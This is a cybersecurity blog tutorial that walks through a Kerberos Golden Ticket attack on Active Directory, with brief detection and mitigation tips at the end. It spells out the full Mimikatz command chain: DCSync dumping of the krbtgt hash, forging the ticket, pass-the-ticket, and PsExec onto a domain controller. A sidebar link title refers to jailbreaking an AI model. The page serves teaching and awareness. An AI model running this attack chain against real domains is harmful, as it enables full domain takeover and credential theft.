Write
OneWriteup
  • Login
  • Trending
  • Articles
  • Blog
  • Tutorials
  • News
  • Research
  • Top 10 Lists
  • Case Studies
  • Writeup
  • Interviews
  • Personal Stories
  • Infographics
No Result
View All Result
  • Trending
  • Articles
  • Blog
  • Tutorials
  • News
  • Research
  • Top 10 Lists
  • Case Studies
  • Writeup
  • Interviews
  • Personal Stories
  • Infographics
No Result
View All Result
OneWriteup
No Result
View All Result

How to perform Golden Ticket Attack in Active Directory in 2025?

FOUNDER by FOUNDER
August 19, 2025
Reading Time: 7 mins read
23
0
Golden Ticket Attack
Share on FacebookShare on Twitter

What is a Golden Ticket?

A Golden Ticket is a forged Kerberos-Ticket Granting Ticket which grants complete access to AD environment.

What is Golden Ticket Attack?

Golden Ticket Attack is a type of cyberattack in Active Directory Environment. It exploits Microsoft  Kerberos Authentication Protocol which is windows default authentication protocol. The threat actor craft’s a golden ticket by compromising the “krbtgt” account , By using this golden ticket the attacker gets unrestricted access to an organization’s entire domain—including devices, files, and domain controllers.

Tools used for Golden Ticket Attack.

1. Mimikatz

  • It is a  well-known tool for extracting credentials from Windows memory, enabling attackers to retrieve password hashes, plaintext passwords, and Kerberos tickets, which can then be used to forge Golden Tickets.

2. Impacket

  • Its is a  Python toolkit for handling network protocols and includes utilities for tasks like remote execution and Kerberos ticket creation, particularly useful for generating Golden Tickets.

3. Rubeus

  • It is a  C# tool designed for managing Kerberos tickets, allowing attackers to request, inject, and manipulate tickets, including the use of Golden Tickets for persistent access.

4. Metasploit Framework

  • It is a  penetration testing framework with modules for exploiting, credential dumping, and post-exploitation; integrates with Mimikatz for injecting Golden Tickets to maintain privileged access in Active Directory.

Requirements for Golden Ticket Attack.

The attacker needs access to a machine that is part of the Active Directory environment and must have local administrator privileges on that machine to run Mimikatz with elevated permissions (“Run as Administrator”).

 

How to perform a Golden Ticket Attack?

Step 1: Download and Install Mimikatz

  1. Download the Mimikatz tool from the official GitHub repository:
    • https://github.com/ParrotSec/mimikatz
  2. Run Mimikatz as an Administrator to ensure it has the necessary privileges.Golden Ticket Attack

Step 2: Obtain Privilege Elevation in Mimikatz

  1. In the Mimikatz command prompt, elevate privileges by running:
    privilege::debug

Step 3: Dump the krbtgt NTLM Hash and SID

  1. Run the following command to retrieve the krbtgt NTLM hash and domain SID:
    lsadump::dcsync /domain:kserver.local /user:krbtgt

    Replace kserver.local with your actual domain name.
    Golden Ticket Attack

Step 4: Generate a Golden Ticket

  1. With the obtained NTLM hash and SID, use the following command to create a Golden Ticket:
    kerberos::golden /user:administrator /domain:kserver.local /sid:S-1-5-21-1202111685-2363350227-2141688259-502 /krbtgt:986ac3293eae2f5cc428808c41e8b894 /id:500
    • Explanation of parameters:
      • /user: Target user account (e.g., administrator).
      • /domain: Target domain (e.g., kserver.local).
      • /sid: Domain Security Identifier (SID).
      • /krbtgt: NTLM hash of the krbtgt account.
      • /id: User ID (typically 500 for admin).
    • This command saves the Golden Ticket to a file named ticket.kirbi.

Golden Ticket Attack

Step 5: Load the Golden Ticket

  1. Load the Golden Ticket into your session:
    kerberos::ptt ticket.kirbi

Golden Ticket Attack

Step 6: Open a New Command Prompt with the Ticket

  1. Start a new command prompt window to use the Golden Ticket with:
    misc::cmd

Step 7: Download and Set Up PsTools

  1. Download PsTools from Microsoft’s official website:
    • PsTools Download
  2. PsExec will allow remote command execution on the domain controller.

Step 8: Execute Commands Remotely

  1. In the Mimikatz command prompt, run PsExec to gain access to the domain controller:
    PsExec64.exe \\192.168.1.150 cmd.exe

Replace 192.168.1.150 with the IP or domain name of your target machine.Golden Ticket Attack

 

Complete Video Tutorial:

 

How to Detect Golden Ticket Attack at SIEM?

Event IDs to monitor:

  1. 4769: Service Ticket Request (TGS) — Can reveal suspicious service requests from high-privilege accounts.
  2. 4624 (Logon) — Look for direct logins or activity associated with the krbtgt account.

How to mitigate Golden Ticket Attack?

  1. Regularly Reset the krbtgt Account Password.
  2. Limit Privilege Escalation and Privileged Account Access.
  3. Implement Enhanced Kerberos Security Policies
  4. Apply LAPS (Local Administrator Password Solution)
  5. Use Smart Card Authentication or Multifactor Authentication (MFA)

Read Similar Articles:

What is Password Spraying Attack? Complete Practical Guide 2024.

Disclaimer: This blog is for educational purposes only, promoting awareness of ethical hacking and cybersecurity to help readers protect against cyber threats. All content is based on lawful experiments on our own systems. No illegal activities are endorsed. Users agree to apply the information responsibly and legally. The blog and author are not liable for any misuse. By using this blog, you agree to use all knowledge ethically and legally. [Read full disclaimer].

Buy me a coffee
FOUNDER

FOUNDER

Cybersecurity aficionado committed to disseminating expertise, crafting articles that empower others to resolve errors and fortify online defenses with ease.

Recently Posted

Beginner’s Guide to Reverse Engineering Malware with dnSpy

Beginner’s Guide to Reverse Engineering Malware with dnSpy.

August 19, 2025
176
DNS Based Data Exfiltration Using Burp Collaborator Client

DNS Based Data Exfiltration Using Burp Collaborator Client

August 19, 2025
144
Jailbreak Gemini 2.5 Pro: A Guide to CLI Access and Jailbreaking in Kali Linux

Jailbreak Gemini 2.5 Pro: A Guide to CLI Access and Jailbreaking in Kali Linux

August 19, 2025
1.1k
HOW To BECOME AN ETHICAL HACKER ROADMAP

Free Cybersecurity Roadmap for Ethical Hacking Career in 2025

August 19, 2025
886
Load More

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Recommended

How to Create and Connect Users in Active Directory?

How to Create and Connect Users in Active Directory?

August 19, 2025
218
DNS Based Data Exfiltration Using Burp Collaborator Client

DNS Based Data Exfiltration Using Burp Collaborator Client

August 19, 2025
144

Popular Story

  • Jailbreak Gemini 2.5 Pro: A Guide to CLI Access and Jailbreaking in Kali Linux

    Jailbreak Gemini 2.5 Pro: A Guide to CLI Access and Jailbreaking in Kali Linux

    203 shares
    Share 81 Tweet 51
  • 100 Most Asked SOC Analyst Interview Questions For Freshers

    125 shares
    Share 50 Tweet 31
  • How to use Bloodhound / Sharphound for Pentesting Active Directory?

    130 shares
    Share 52 Tweet 33
  • OSCP vs OSCP+: What New Changes Have Been Made?

    119 shares
    Share 48 Tweet 30
  • Free Cybersecurity Roadmap for Ethical Hacking Career in 2025

    159 shares
    Share 64 Tweet 40

Support This Write-Up. Fund the Next

Buy me a coffee
OneWriteup

Discover expert cybersecurity articles, tutorials, and the latest trends to protect your digital world.

  • Disclaimer
  • About Us
  • Feedback
  • Contact Us
  • Report
  • Privacy Policy
  • Community Guidelines
  • Terms Of Service

© 2024 OneWriteup

No Result
View All Result
  • Trending
  • Articles
  • News
  • Blog
  • Tutorials
  • Research
  • Top 10 Lists
  • Case Studies
  • Interviews
  • Login

© 2024 OneWriteup

Welcome Back!

Login to your account below

Forgotten Password?

Retrieve your password

Please enter your username or email address to reset your password.

Log In